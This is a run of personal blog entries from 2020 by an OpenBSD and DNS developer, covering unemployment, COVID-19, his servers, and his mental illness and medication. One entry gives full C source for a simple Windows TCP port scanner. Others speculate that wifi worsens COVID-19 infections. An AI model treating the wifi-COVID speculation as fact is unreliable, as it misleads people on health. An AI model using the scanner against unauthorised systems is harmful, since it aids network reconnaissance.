in my life and that's not exactly much. Let's have a run-down where I have
been fired from (oldest last):
Webhosting.com (not mentioned on my resume because I was there 3 weeks)
(After this timeline I had a diagnosis of a mental illness)
Scan Plus GmbH (fired, because I had a medical emergency)
Bavarian Red Cross (fired, circumstances were weird)
In fact the Bavarian Red Cross termination was a golden opportunity to make
three times as much money with my second employer at the time
easyofficephone.com, it actually worked out well. I do not know why the
german system wants to suffocate me when-ever I have any contact with german
employers it's for shit wages and never seems to work out.
All other jobs I left on my own free will in order to find a better paying
job, or better opportunity. It didn't always work out as with Ibcos GmbH,
I actually feel I would have liked to be back at Jive Canada. It was too
bad and since that time I'm unemployed and can't find a decent job.
I'm at a very low emotional state right now, and it's not my fault in my eyes.
I should be happy because I have a great working history and it's amazing
that I had all this free time to persue Open Source project and take it to a
level that noone, and I repeat noone can duplicate inside a short period of
time. I've been working 15 years on this DNS project. That's 15 years
experience.
So this employer who puts me down for not being able to produce documents and
certificates of my job history can take a hike. Why would I want to work for
someone that is speaking down on me in authority when he's got none? Thanks
for nothing, I'm very receptive on negative emotions. You should understand,
I'd rather be on welfare in this screwed up state than to work for an abusive
employer. I have that choice.
Birthday in 7 days, Equinox in 11 days
March 9th, 2020
Yes I'm a winter-born person (officially). I'm turning fourty-four. The
official start of spring is on March 20, 2020. This is the calendar start
of spring because that date is also the equinox. Daylight and night are equally
long that day.
Received present from PiRATA
March 10th, 2020
Thanks PiRATA! I received the book "The art of software security
assessment" by Mark Dowd et al. This was a present in an exchange of
gifts between PiRATA and me. I sent him a K&R and he sent me this.
Research: the 2001 UNIX time_t apocalypse
March 14th, 2020
I've over the last few weeks given this a lot of thought. When I read a post
on hackernews about time_t (seconds since 1970 epoch) rolling over to a 10th
digit (1 billion seconds), I thought to look into software breaking on
Sept. 10, 2001. Unfortunately it wasn't covered long in the media due to
the terrorist attack in NYC the next day, which caused everyone to forget
what happened before. But I'd like to pick up the pieces a little and remind
people that there was a Sept. 10th apocalypse. In a slashdot post I found
while googling it was mentioned that software like FreeBSD's cvsup, OpenLDAP
slave servers and UW IMAP broke. I would assume anything that had 9 digit
space for representing a time_t value would have rolled over to 0.
There is not too much to do here other than look back and learn from history.
The 2036 problem is with Network Time Protocol, and the 2038 problem with
32-bit UNIX time_t's. Many Linux and UNIX's have fixed that to 64-bit value
but computers remain that could be affected. ie.
pjp@rhombus:~$ date --date='@2147483647'
Tue Jan 19 03:14:07 UTC 2038
pjp@rhombus:~$ date --date='@2147483648'
date: invalid date ‘@2147483648’
pjp@rhombus:~$ uname -a
Linux rhombus.centroid.eu 4.9.93-mainline-rev1 #1 SMP \
Tue Apr 10 09:42:40 UTC 2018 armv7l armv7l armv7l GNU/Linux
Here is a good sum-up of these rollover dates (that I also found with google):
Have fun with this, and prepare, if we survive coronavirus without hamsterbuys
(panic buying) then perhaps stocking up on cans for 2036 isn't such a bad idea.
Working from home - it's half as bad
March 15th, 2020
Many people dread working from home because of the covid-19 outbreak. It's
half as bad. You'll get used to it. I did it for 6 hours a day for 7 years.
Make sure you sometimes get to tour the office so you get a feeling of worth
for the operation, that's one thing I missed when I was working remotely. A
period of 2-3 weeks for a tour, to me seems reasonable. It will give you a
feeling that you're still here and worth something to be part of something
greater than you. Feel free to explore technologies that you may not have
explored before. I worked for a VOIP company, so a sip phone was around. We
did try teleconferencing with a camera but I didn't like it so much, try to
keep it off as much as possible (a boss has no right to watch you work,
that's repulsive). I didn't have this problem that I had other people in
my apartment when I worked remotely but if you do have an "office" try to set
rules with family that when you're at work, you're at work and unless it's an
emergency you're not around. Do close the door if you must. For air-flow
purposes I often had the door open though.
I voted in the Schweinfurt city election
March 15th, 2020
I just hope I didn't catch a virus. Other than that, go Holger Laschka and the
greens! Good luck!
Schweinfurt election results 2020
March 16th, 2020
Mayor Remele was voted to stay as mayor, next was Eder, then Laschka. There
was a 45% voter turnout so relatively low. Coronavirus outbreak is likely to
blame.
At city hall the individual parties got the following results:
If you voted, you're fearless. The most fearless neighbourhood is Eselshoehe
which had the highest voter turnout (37%). Good for them, and hopefully
noone was infected with corona during this process.
Looking for work, have home office
March 18th, 2020
If you need any help let me know. My resume is found
here. Have a look.
Given that these are difficult times I can contribute I have 8 years
experience working from a home office. Preferably part-time but full-time
is OK depending on the circumstances.
Angela Merkel will address the german nation tonight
March 18th, 2020
Likely at or just after 8PM. Here is the report
angela
merkel .. (spiegel.de).
Since no news is good news, it can only mean bad news.
Let your weapons rest
March 19th, 2020
It is time for peace on the planet, let your weapons rest. The human family
is under attack with this coronavirus (covid-19) outbreak. There is also
no time to blame anyone for it. If you want to blame someone blame the
aliens. And they are in their spaceships far away, so we can't even get at
them either.
I was very much upset that someone tried to break into my system yesterday.
This is no time to be doing such a deed. It is cowardly, and we know who
the perpetrators are. Let it rest.
Wir vs. Virus
March 19th, 2020
There is a Hackathon taking
place at #wirvsvirus which is a hackathon organized by the federal german
government. I was going to sign up for it, but I refrained. I have enough
projects currently. I'm also a little suspicous of this, which may be my
mental illness speaking. Enough said.
Tomorrow is Equinox
March 19th, 2020
Today the second tree beside my home office window started blooming. Insects
are working overtime on them it seems. Nice to see spring arrive finally.
Could Wifi excite COVID-19?
March 21st, 2020
I remember years ago when I had Freifunk still someone came down in the
alleyway below my building with a laptop. I was sleeping at the time and
woke up. They used a lot of bandwidth but most of all I felt a sort of
burning (a tickling) on the skin of my legs. It was one of the reason why
I decided to get rid of my Freifunk.
Why is China not having any more COVID-19 reinfections, did people there
turn off their wifi? Has anyone checked? Why did Italy and Spain have such
high infections rates and deaths? Were they using wifi in the area? Has
anyone correlated this? I hate to think what someone who has weak immune
system and the neighbour is pumping out wifi signals with COVID-19 what will
that do to their lungs? Will it feel like burning?
Per chance I noticed my wifi AP was on today, I don't know why, it was supposed
to be off. I have to check now if anyone was using it.
Quote from the book Wireless LANS
March 21st, 2020
As per my last article here is a quote from this book by Joerg Rech:
Das Nova-Institut geht zudem einen Schritt weiter und hat sogenannte
nova-Vorsogewerte definiert, die bei einem Hunderstel der gesetzlichen
Grenzwerte liegen. Hierdurch soll nachteilige Auswirkungen fuer die
Menschen ausgeschlossen werden. Dies wird damit begruendet, dass man
sich bei den Auswirkungen der elektromagnetischen Strahlung nicht
ausschliesslich auf thermische Effekte stuetzen sollte. Man geht davon
aus, dass dauerhafte elektromagnetische Strahlungen auch Schaedigungen
des Immunsystems hervorrufen koennen, die die Entstehung von Krankheiten
beguenstigen koennen.
That's all I need to know. I'll translate this now.
The Nova-Institute goes one step further and has defined so-called nova
criteria, that lie at a hundredth of the lawful limit (of Wifi). With this
they try to deduce human health effects. The reason for this is that one
should not rely alone on electromagnetic radiation and it's thermal effects.
It is their point that continuous electromagnetic radiation could lead to
defects of the immune system, which could uplift sicknesses.
Something like that. The website of the
Nova Institute.
So we know that the EU law says that Wifi should not exceed 200 mW, they are
saying it should be as low as 2 mW. That's a huge diff!
Last week that is. I'm trying to help Mike Larkin and his research group
to port OpenBSD to the RISC-V platform. I was focused on the DDB code to
make it work and we have a semi-working DDB now. I have done the following
now: Forked Mike's project, syncronised this project to be up to date (
There is a Link here on how to do that), and I've
committed and pushed changes to my project which then was ready for a pull
request to Mike. This was a steep learning curve, and a big hustle to get
the code written. It's still not done fully but I'll need less and less
handholding with git and github as time goes forward. You may have noticed
a new file
I hustled yesteday and today to get this working on AMD64, the output was
inserted into my github project. BTW my github account name is "pbug44".
Next on the agenda is probably how to make DDB do a backtrace.
Corona Virus vs. the Microchip
March 27th, 2020
A few weeks ago I likened this a standoff between a biological virus and the
Internet. But now there is AI and supercomputers folding virus proteins and
they may not be online. All efforts humanity has against this virus is our
beloved computers. Home office, only possible with Internet. It doesn't
defend against the virus but creates an airgap between infections. If you
haven't heard already Rosetta@Home and Folding@Home are crunching numbers
against this virus. The outcome is models on how it works, to better
understand it. I'm not going to partake in this because I don't have a big
ass GPU to have an efficient means of partipation. This is also why I
haven't partiticipated in the late SETI@home. Good luck to the microchip
winning against the virus.
Happy April 1st, ya fools!
April 1st, 2020
Today is a foolish day. I'm gonna do foolish things I think.
This day in...
April 1st, 2020
Not an April fools joke, but I foolishly wrote it on the live blog. We now
have a "This day in..." section on the right. There you can see what happend
on other years of this day. I haven't ironed out any bugs if there is any,
but this should be ok. This was directly inspired by slashdot, which I read
daily. Enjoy.
I have upgraded this blog
April 2nd, 2020
I have written a simple configfile for the centroid blog. You find the repo
in the "Other Links" section on the right under "Centroid Blog Open Source".
there was some differences between what was running here and what is running
at delphinusdns.org so I merged them. There is now minute differences to what
it was before on this blog. But I can fix that soonish. This also makes
running this blog on other hosts much much easier. The changes from yesterday
are in the repo now, btw.
Turned off the heat for the 2019/2020 winter season
April 7th, 2020
I turned the heat on on October 7th so it's been six full months electric heating. We have great
25C weather outside now, and I could have been a bit faster turning the heat
off. Oh well. Now is spring and soon summer.
EU Solidarity
April 8th, 2020
Is the EU just a monetary union? Here is what I've heard. Spain, France and
Italy want Corona bonds. Germany wants to use an ESM directive that would
put conditions on borrowing money. In my understanding it is China and
the USA's best interests to see a weak EU, even a disbanded EU. We should
look at ourselves, but don't let it be influenced from elsewhere. Let's take
a good look. What's wrong with this EU? How can it be bettered? Where is
our solidarity towards member countries?
Happy Easter
April 12th, 2020
I don't really know much about easter other than that I sometimes get a
chocolate easter bunny to eat. But for those that this day has meaning..
Happy Easter.
My computer hardware plan for 2022+
April 13th, 2020
I'm not buying any new computers (hopefully) until 2022. That is my plan.
And then I'm going to make changes.
beta - my workhorse OpenBSD/amd64 workstation will likely be changed to run
Windows Server 2019 until the year 2024 before retirement. (it will be 10 y.o.)
the NUC that runs Windows server now will remain a Windows workstation but
I may increase the RAM on it to 16 GB, until 2024 at least
I'm looking for a non-x86_64 workstation for 2022, whether it will be a
raspberry pi 4 or a raspberry pi 5 (doesn't exist yet). I do not know.
My servers that I have now will remain until 2023/2024, after that I'll
have a colo (dreams) or go back to the cloud.
I'll need a new core router for home, something that is faster (than a
unifi security gateway), and that doesn't have fans, I prefer OpenBSD OS on it.
The speed I intend to go to 250 Mbit/s in 2021/2022, and possibly gigabit fibre
in 2024 (if available)
In 2021 or 2022 I'm looking to replace my vodafone gigacube flex with a
spacex starlink setup for backup purposes, it has to be powerable by my solar
battery (12V) for emergency service
So you see I'm somewhat slimming down, but also phasing out Intel (hopefully).
Cloud Providers that allow OpenBSD
April 13th, 2020
In the past I've used these listed cloud providers:
All these providers should be able to get you an OpenBSD cloud computer.
Vultr and Transip.eu taught me that the console sometimes works best in
NL language mode. Hetzner has 20 TB traffic or something per VPS which
is awesome. Right now I'M not using any cloud computers I'm using real
computers (bare metal), but I'm keeping my eye on these as when the
computers (intel cpu's) are fixed there is all the reason to go back to
these.
Comparison between my Xeon Workstation and other CPU
spica$ ping goldflipper.de
ping: no address associated with name
so.. if you wanted to take a look on how it last looked...go
here.
I've taken down schweinfurtdating.de
April 18th, 2020
It was on is last leg having expired on the 4th of April anyhow. I think they
gave me some grace time. I have removed the zone from my nameservers. This
is the second domain this month to have expired.
This is a historic photo (in more ways than one)
April 20th, 2020
On January 1st, 1959, the USS Skate became the first ship to surface at
the North Pole of Earth. It was the second ship (submarine) at the North
Pole after USS Nautilus. Get used to this image because scientists recently
ran 40 simulations and determined that ice at the north pole will become first
seasonal and eventually the north pole will become open waters. There will
not be any polar bears to greet submarines (as you may have an image of in
your mind), as they will all die if they go to the north pole. This earth
is changing. We blew it. Can we cool earth again? I don't know.
The photo is courtesy of wikipedia's
USS Skate
article.
Was COVID-19 man-made?
April 21st, 2020
Heise.de/Telepolis wrote this article over night. I don't know what to make of it, biology
is not my expertise at all. If indeed the virus did escape a laboratory what
should be the consequence? What should be our responses to this?
You can't always get what you want
April 23rd, 2020
Carl Benz (combustion) displaced horse drawn carriages and contributed a
significant chunk to CO2 in our atmosphere. Digitalization (microchip)
replaced photo developing techniques and caused layoffs. SpaceX Starlink
will blanket the sky with satellites (Internet) and Astronomers predict
it will end their careers or hobbies. Ice will likely melt due to global
warming (current technology) and the next place to get naturally occuring
ice will be from Mars. When do
the benefits outweigh the drawbacks? Yes it's sad to see everything
changing but changes bring new opportunities too. We're saying goodbye
to an old life and hello to a new life (perhaps off this planet). We need
to adjust to these changes because they are out of our control individually.
The age of Aquarius may be starting soon. Can we save our planet still? Our
only home thus far? I don't know of any efforts to save the planet other than
people planting trees and plants (Africa/Asia).
Stats from one of my Nameservers
April 24th, 2020
I collect stats for number of queries and for what domain name. Here is a
table of what people looked up on one out of my three nameservers over the
past year:
percentage of total
domain name
notes
18%
"rhombus.centroid.eu."
ipv4-only nameserver
14%
"kite.centroid.eu."
this nameserver
13%
"centroid.eu."
my domain
12%
"trapezoid.centroid.eu."
nameserver
5%
"mail.centroid.eu."
mail server
4%
"delphinusdns.org."
another domain
2%
"virgostar.net."
another domain
2%
"schweinfurtdating.de."
another expired domain
1%
"solarscale.de."
another domain
1%
"_25._tcp.mail.centroid.eu."
likely a tlsa query (DANE)
It seems my NS records cause a lot of lookups (about half of them, 44%), I
learn more about the domain name system all the time.
EU, different from China or USA?
April 26th, 2020
We know China is different politics wise. But USA and EU seem to be on course
as capitalist political societies. Rich people who invest in these countries
make a killing off its infrastructure and often make a killing in monetary
wealth. Often they do this on the backs of the poor.
Politically I suppose I'm for making europe a bit different where rich people
are treated like someone from the middle class and have a harder time making
money but poor people have an easier time making money to get by living.
Perhaps we need something like universal basic income to set us apart from
the others. Not quite ultra capitalist but not communist either.
Administrivia: I have turned autocomplete to off
April 28th, 2020
In forms on this blog site you will not get old suggestions anymore. It was
long my desire to change this.
My "vacation" is over
April 30th, 2020
Well I didn't find any jobs that were interested in hiring me. Covid-19
outbreak didn't help at all here. I'll be seeking social assistance for
the month of may and possibly beyond. My money has run out. I'm poor
once again. Accomplishments during my "vacation" were 2 releases for
delphinusdnsd (1.3 and 1.4) which are open source and every year they get
better. So literally I was working, only not for money, because delphinusdnsd
is open source. I had some other personal successes that I'm not going to
mention. More on this:
It's amazing that I managed to spend 2 years unpaid off my own savings. I
guess I was richer than I thought.
Blogroll: DelphinusDNS project now on GITHUB
May 1st, 2020
This is already two days old news but if you don't follow the delphinusdnsd
blog which split from this blog, here is the news, delphinusdnsd is now on github. I'm very
happy about this progress!
Domains of mine that will expire
May 3rd, 2020
Two domains I already mentioned they are in their post-expiration phase:
schweinfurtdating.de
goldflipper.de
These will cease at any time, in fact one is already been turned off. Then
there is another two that will expire by and in september 2020.
freifunk-schweinfurt.de (expires in june)
virgostar.net (expires in september)
That leaves me with 5 personal domains and a number of domains that I host.
That's as far as I can "cut the fat" basically, I'll have to do with what I
have there for a while.
May the fourth^Wsource be with you!
May 4th, 2020
In October 2000 (almost 20 years ago), I was blessed to have three authors
autograph their book for me! I want to show. The book is now close to 23-24
years old and it may fall apart soon. It survived a fire as well.
Easy little coder, Obi-wahn!
A new experiment
May 5th, 2020
We all have an alter-ego. It lives in our dreams and often makes no sense.
On top of that I'm schizophrenic and thus I make no sense anyhow. I'm going
to start writing down my dreams and delusions that I encounter since I
predicted (to myself) the unleashing of a terrible virus to those that
oppress me roughly in november. I needed something searchable that I could
prove to myself I wasn't deluding myself. Here is a new (in dark mode)
blog that I set up based on the centroid blog.
I do not know if I should write this stuff out because it will be embarrassing
and may incriminate me as the source of say.. coronavirus, so here it is!
Today is the blogs 11th anniversary
May 6th, 2020
Although this article
displayed May 7th, it has a timestamp exactly at midnight meaning in GMT it
is May 6th.
beta$ TZ=GMT date -r 1241647200
Wed May 6 22:00:00 GMT 2009
It's fair to say today is the anniversary, there was a few articles that I
started deleting (forgetting) in the first few years but then I decided to
retain it all. Happy Anniversary!
A Mercury Mining base
May 8th, 2020
Centered around a south or north pole crater (image map from NASA Messenger)
this is how I envision a mercury base:
The roads are made of aluminum or iron and are maglevs. They have to resist
the heat (when they are unused) and will only be used on the night side.
I have something of 40 days in mind per arm, then the maglev moves everyone
either to the center base or along the ring maglev roads away from the sun.
Whatever gets mined will be shot up and solar sailed to venus to create a
giant shade. Once Venus is cooled colonization efforts can begin.
Hidden Links between Mental Disorders
May 10th, 2020
A story at nature.com. I didn't read all of it but only areas that shot out at me.
Unfortunately, if schizophrenics could be cured they won't be. That is my
honest opinion. For one the psychiatric jobs it creates is too good to be
true for the (parasyte)-economy. Also if I was faced with taking treatment
that would forever cure me, I'd be careful of acknowledging. The functions
in my brain are
it for a reason, they are a representation of the earth's environment. To
"cure" this, would only sweep the problems of earth under a carpet. A cure
is not a cure, when the underlying reasons for the illness are not addressed.
Yes we're killing our habitat, you may not agree, but I think so.
The corellation between COVID-19 and Schizophrenia
May 10th, 2020
Both have something in common. There is no cure. Think around that for a bit.
Administrivia: fixed autocomplete for comments
May 12th, 2020
I have fixed autocomplete for the comment form so that if you get the
captcha text incorrect and go back the text you wrote will still be there.
Sorry for inconveniences, but so far it's just me commenting anyhow.
Mails to Gmail from centroid.eu will end up as spam?
May 12th, 2020
I'm not willing to put DKIM on my mail server (just yet). I have SPF
records, and DNSSEC, that should be all that's needed. Sorry Google
you're being stupid. Users that expect a mail from me at gmail should
check their spam INBOX.
A perfect anagram cgi
May 12th, 2020
I have added a new cgi to my websites. This one is under
dtschland.eu which I have chosen to make
an online anagram site. Enjoy.
When is opinion opinion and when is it conspiracy theory?
May 14th, 2020
Just a reminder to people that opinion of any individual in a democratic
society is granted. If you demonstrate for your opinion, even when it is
twisted, you should be allowed. You have a right to your opinion.
Some people _may say_ that you "should be locked up" but they don't mean it.
What they mean, is, that their opinion differs. Be careful of acting on
what is a differing opinion. Noone has the right to empose a fine or a jail
sentence for their opinion.
Radiation in Garching? Not so!
May 16th, 2020
Something is wrong (in my opinion). There was a report that a nuclear accident
happened in Garching near Munich.
Yet when you look at the chart of radiation statistics stations there is no
such radiation in Garching.
But where I'm living there is a lot of radiation.
We're much higher than northern germany and higher than the Munich area. So what's the
idea here?
When I was a child, I played outside as the Chernobyl nuclear
disaster happened. I disregarded the warning signs of not entering the play
ground areas etc etc. I should have stayed inside I guess. Today I have some
health problems. I remember being in the northern part of Schweinfurt near
the old firestation (current location is not where it was, closest location
would have been the old Army MP station). Anyhow there was people in yellow
anti-radiation suits and one of them grabbed me, and I fought back. This was
no dream, it was real. I couldn't understand what was happening but they made
me believe I was in a movie scene. Funny that because there is not too many
movies of this kind around.
Anyhow right now I'M confused why these values of
averaging 0.200 microsieverts/hour avg. are in this area. There is a nuclear powerplant
near here. And they haven't taken down the cooling towers yet. On contrast
just last week I saw on tagesschau.de (ARD)
that they demolished the Philippsburg cooling towers by means of controlled
explosion. Since Philippsburg was just recently switched off I'M left thinking
why the demolishion of Grafenrheinfeld nuclear power station is taking so long.
They switched it off in 2015, that's 5 years ago. So why is it taking so long?
I personally think something doesn't add up. Should I put a conspiracy theory
out there like so many people do?
In May 2002 I was first put on anti-depressants. In late 2002 (possibly) on
stronger medication. It's been 18 years now. I'm an adult psycho finally!
Can I drink a psycho-beer?
New revelations on Luvox (drug)
May 20th, 2020
I've become aware that the drug I took from May until September of 2002 has
side-effects in 0.1% to 1% of takers that describe the symptoms for my
schizophrenia.
Hallucination
Confusional State
Furthermore, fluvoxamine
aka luvox, has been known to work long-term, and retains its therapeutic
efficacy for at least one year. According to the wikipedia, article. At
least one year. I was in a psychiatric hospital in June of 2003 where the
doctors said I had a Schizoaffective Psychosis (based around confusion).
Yes I do have rumaging and intrusive thoughts, but not hearing voices. This is
more what is described for OCD. In fact I still seem to fit into the
description of having OCD over Schizophrenia. To myself at least.
I dunno, see last article, I did take my medications for 18 years, like a
dummy perhaps? I asked repeatedly at my Psychiatrist if there is any doubt
that I do have Schizophrenia. And the answer was no. So who's to be
believed? Anyhow I got more self-talk to do in my lonelyness.
Brand names are being held hostage by the advertising industry
May 23rd, 2020
I've been reading a lot of online newspapers and magazines. I can't
believe some of these ads they show. It seems to me that the ads are
tarnishing the good names of the media. But suit yourself, if you
really want to ruin your brand.
The potential for steganography in Copyrights
May 23rd, 2020
There is potential for steganography in all source code. I chose to use
Copyright notices on .c and .h files and came up with a binary file that
is 6K in size. Fortunately there is no such practice in OpenBSD. The
concept is simple. Every time there is a (C) in the copyright that's a binary
1 and every time there is a (c) thats a binary 0. Thus with a simple program
(two actually) I was able to sift through all copyright notices.
beta$ ls -l output
-rw-r--r-- 1 pjp wheel 49917 May 23 10:28 output
beta$ ls -l binary
-rw-r--r-- 1 pjp wheel 6239 May 23 10:39 binary
There was no hidden messages. On another matter, the OpenBSD kernel does not
compile on octeon in 6.7 and is stalled on a compact.c file. On my equipment
I did a workaround, but compiling these may be hard for someone not experienced.
Web server maintenanced
May 26th, 2020
I have maintenanced my web server. It is running a new version of the OS.
I'm not done yet, but I may be tomorrow. Good night. For the time being
comments are off.
I drew something like this in Grade 7
May 26th, 2020
A gift for you! I don't have the original anymore.
Every beings identity
May 26th, 2020
We all have our favourites. A whistle, a tune, a way of saying things. It
makes people remember you. I also think carrying your choice of music is
part of your identity. It may have been planted on you, or it was taken by
choice. Here in Schweinfurt, I listen to the birds (unwillingly) as they
tweet through the area in syllables. To me those syllables mean something
or they remind me of someone. It's almost torment, but these birds only
express their identity. Their parents identity too perhaps. They learned
these noises in the nest. Yeah I'd like to shoot that bird sometimes but
it has a right to exist. Can you think of mimickers in nature? Does a
cat's meow sound like a crying little baby on purpose to win our hearts and
succumb to its manipulative efforts of being liked? Whatever you think is
true I know one thing. What I carry is part of my identity. Whether it is
first thought of by someone else or not. Strip that music from me, you'll
strip part of my identity. It would be torment.
Back for now
May 28th, 2020
The last few days I reinstalled all my servers. I had a rootkit installed
on both of them. A third server which was a scaleway linux host I turned
off because I could not deal with them right now. I'll leave that server
in an off state for a month in order to decide if I want to keep it or not.
I have updated my DNS servers for all my zones. I'll likely have to also
rotate the DNSSEC keys. You can't trust what's coming from centroid.eu as
much as google.com (which is unsigned). Treat it as unsigned DNS info even
though it has a signature, until I have changed all KSK and ZSK's.
I believe the breach occured through BIND or opensmtpd. There was a window
of opportunity with opensmtpd for someone to gain root access. Sure it's
been a while but I didn't see evidence for a breach for some time. In regards
to BIND, I'm just assuming becuase it displayed weird behaviour. Make sure
if you have a similar setup as mine (if you know), that your nameservers are
in order and both resolve to forward AND reverse dns to the same name.
Can't judge a book by its cover
May 28th, 2020
This is an idiom, to describe that you can't quickly look at something and
make a determined diagnosis of it. Take a picture album. These are just
slices of your life perhaps but don't tell the entire story. They are
snapshots in time. You don't see progress in these slices. In fact the
photos only tell a story, in the photographers eyes, who may or may not be
trustworthy. When I look into a photo album I see that I have no eyes.
There is no eyes. Since birth.
Hacks, network security etc.
May 28th, 2020
The low hanging fruits were already gone 20 years ago. Sophistication can
likely only be aquired with larger teams. This is not to say that this
should be done. However, to learn that a backdoor exists for example,
proof of concepts could be done in teams. Likely at the NSA or someone.
I have a book here that covers amplification denial of service tools in an
entire chapter or so. Likely wasted space these days. These books are very
thick and several volumes. Likely they can be cut down.
When reading source code, which is a very memory and mental intensive work,
you should likely approach this systemically by working down a list. I've
in the past taken stabs at source code reading but it wasn't systemically.
Also set your goals low, an entire OS for reading is not likely going to
work. Seek help as in human resources. I've made my own programs so that
I can practice reading on that over other programs. I think I'll pick this
up once my headache clears.
Goldflipper is back in the news
May 29th, 2020
Goldflipper is back in the news. The green lit panel was in a vision. I
seem to recall that I still see floaters in my eyes.
BSI uses Alg 5 for bsi-fuer-buerger.de
June 3rd, 2020
I informed myself on the BSI website about the Buerger CERT and found that
their DNSSEC is signed with Algorithm 5.
+--------+--------------------+-----------------+-------------------+
| Number | Mnemonics | DNSSEC Signing | DNSSEC Validation |
+--------+--------------------+-----------------+-------------------+
| 1 | RSAMD5 | MUST NOT | MUST NOT |
| 3 | DSA | MUST NOT | MUST NOT |
| 5 | RSASHA1 | NOT RECOMMENDED | MUST |
According to RFC 8624 this algorithm is not recommended. BSI if you read this
please consider upgrading / hiring human resources.
It was a murder of crows
June 3th, 2020
Ra, Ra, Ra!
I've decided to go off my medication
June 3rd, 2020
I don't need this anymore.
Golem.de - how do you know?
June 5th, 2020
Golem.de claims in a story to know the internal systems of the B-21 bomber.
How do you know? Have you been listening to psychics or something?
Introducing: Project STARGATE
June 5th, 2020
I could only find this in english wikipedia. You can translate it in your
browser. Apparently
Project STARGATE used psychics (with psychedelic drugs?) to achieve a
tactical and strategic advantage (my conclusion). Take it with a grain of
salt, since it is wikipedia after all. If these allegations are true, then
that would make the psychics prisoners of the military. This is not good,
nada.
Protesting: My experience and recommendations (in hindsight)
June 5th, 2020
I attended protests in 2001. Here is some recommendations in hindsight.
Don't go alone
Have someone be the getaway driver
Have a network of people getting you out
Never say your real name, unless you have a big network
In my experience they got me before I realised what happened
You'll be "charged up" your nerves will/may not take it
Know your group, stay with it, don't get split
When I protested there was two groups in the end
It's a scary experience once you've been through it
Protesting alone is stupid, you'll be first one taken
These are the things I wished I would have done before listening to the radio
to "come out!". I'm here now, but where am I?
Helicopters hovered above yesterday
June 6th, 2020
Civilian helicopters hovered above my apartments yesterday. Why don't they
leave us alone? This should be illegal.
How do you know that a document _was not_ shreddered?
June 8th, 2020
You find little pieces of paper that do not fit the page that was shreddered
and you weigh the entire thing with an atomic scale. Chances are the page
that was supposedly shreddered, was not. When someone tells you they destroyed
a piece of paper, upon your wish, where your signature was on, but they really
didn't, is that illegal? I think it should be.
Freedom for IT folks in Germany
June 9th, 2020
I have been in IT for quite a while. I didn't always work long at projects
but I have been doing it since 1997. In Germany, it's hard to prove that
you're elegible for getting "Freiberufler" status. This I recently found out.
I had to change my resume in such a way that it reflects I did Freelancing
but not "Freiberuflich". As the Schweinfurt Jobcenter dictated to me the
following words: "Ein freier Beruf ist ein selbstaendig ausgeuebter
wissenschaftlicher, kuenstlerischer, schriftstellerischer, unterrichtender,
oder erzieherischer Beruf". In translation this somewhat translates to:
"A independent profession/professional is an independent task that is
scientific, artistic, works of an author, educational or kid raising job".
The devil is in the detail. While you can look up freelancer, it will
translate to freiberufler but as per definition above you can really only use this if you're in
computer science.
A computer scientist by definition is someone who has a PhD, MS, BS degree in
computer science or equivalent in the maths. So that excludes me because I
don't have the degree. I have IT-Netzwerkadministrator certificate from IHK
but it's next to useless becuase it does not grant me the same rights.
However there is room for contest.
Konrad Zuse the Pioneer of computers in
Germany did not have a Computer Science diploma he was an engineer. And yet
he was highly decorated and the pioneer of computers here. So he would not
have been able to ever work as a "Freiberufler", had he done so all his
decorations would/should be nilled and anything leaning on his works as well.
Obviously that's a big gaping "what if". As you know I'm very artistic with
my blog, but I cannot use computer work in an artistic way can I? That's
another "what if"? In the 20th century an artist would have to buy his
canvas and paints. In the 21st century a computer artist would buy a computer
and have a wacom tablet perhaps (I do have one). I'm also an author, I have
written a C primer yet I have never published it. It is freely available
at hackepedia and yes it is educational.
These are all a bunch of contestings regarding the definition of what is a
"Freiberufler". It's rather silly, I mean I studied several semesters of
Computer Engineering (did not graduate) but for life skills I should have
been studying law. Because this system tries to cut off oxygen from any
worker who dons a computer. I find it's really bad how the german system
takes english words, twists them around in definition and then offers an
english word (such as freelancer) as the proper definition. It's not
systemic and is rather a patchwork in law. English speakers are left confused
and unable to perform a job.
Similarily a german speaker in an english country
may not be able to use his or her knowledge of german law, becuase there is
no equivalent. The focus in England for example is to have a blacklist of
things you can't do, not a whitelist of things you can do, strictly speaking,
in law. This is why Brexit, to me, in my humble opinion was a good thing for
british because the EU has adopted the whitelist of things you can do (in law)
much like the german system. Please, if you were anti-brexit consider this
point, as the british system cuts down on buaurocracy and gets rid of the
law reciting people who pick on you for every little bit of freedom you may
have. You just have a few dozen rules to keep in mind on the blacklist of
crimes, instead of having to know the whitelist of things you can do which is
ever growing.
Made a small Windows TCP port scanner based on connect()
June 9th, 2020
I call this program connect.c. I haven't written any windows winsock programs
in at least 18 years, so this was a clean start.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
int
main(int argc, char *argv[])
{
SOCKET s;
struct sockaddr_in sin;
WSADATA WSStartData;
char buf[512];
char *p;
u_short port, limit;
WSAStartup(MAKEWORD(2,0), &WSStartData);
if (argc != 3) {
fprintf(stderr, "usage: connect IP PORT-RANGE\n");
exit(1);
}
if ((p = strchr(argv[2], '-')) != NULL) {
*p = '\0';
p++;
limit = atoi(p);
} else
limit = atoi(argv[2]);
for (port = atoi(argv[2]); port <= limit; port++) {
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == INVALID_SOCKET) {
fprintf(stderr, "invalid socket\n");
exit(1);
}
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
sin.sin_addr.s_addr = inet_addr(argv[1]);
if (connect(s, (struct sockaddr *)&sin, sizeof(struct sockaddr_in))
== SOCKET_ERROR) {
if (port == limit)
printf("%s at port %d is not listening\n", argv[1], port);
closesocket(s);
continue;
}
printf("%s at port %d IS LISTENING\n", argv[1], port);
closesocket(s);
}
exit(0);
}
I have compiled this program with clang 10.0.0 for windows 64-bit. It is
a pleasure to use with the CMD command line, and writing the code was done
through EDITOR.EXE. It was a bit awkward because I originanally couldn't
find the \ key. Oh well.. perhaps I can port a program of mine to windows
some day.
Two races, anything else is irrelevant
June 10th, 2020
Whether black, brown, yellow or red, all this is irrelevant. It's all about
the two races. The slow race and the fast race. I've been seeing fast
people for 20 years now, sharing space with me. Don't try to sell me hogwash
that these don't exist! I'm of a slow race. I don't think coexistance is
possible.
What does 8-bit-clean mean anyways?
June 10th, 2020
In the README in the sources for ed in OpenBSD, there is the following
paragraph:
beta$ more README
$OpenBSD: README,v 1.5 2018/06/15 08:46:24 martijn Exp $
$NetBSD: README,v 1.9 1995/03/21 09:04:33 cgd Exp $
ed is an 8-bit-clean, POSIX-compliant line editor. It should work with
any regular expression package that conforms to the POSIX interface
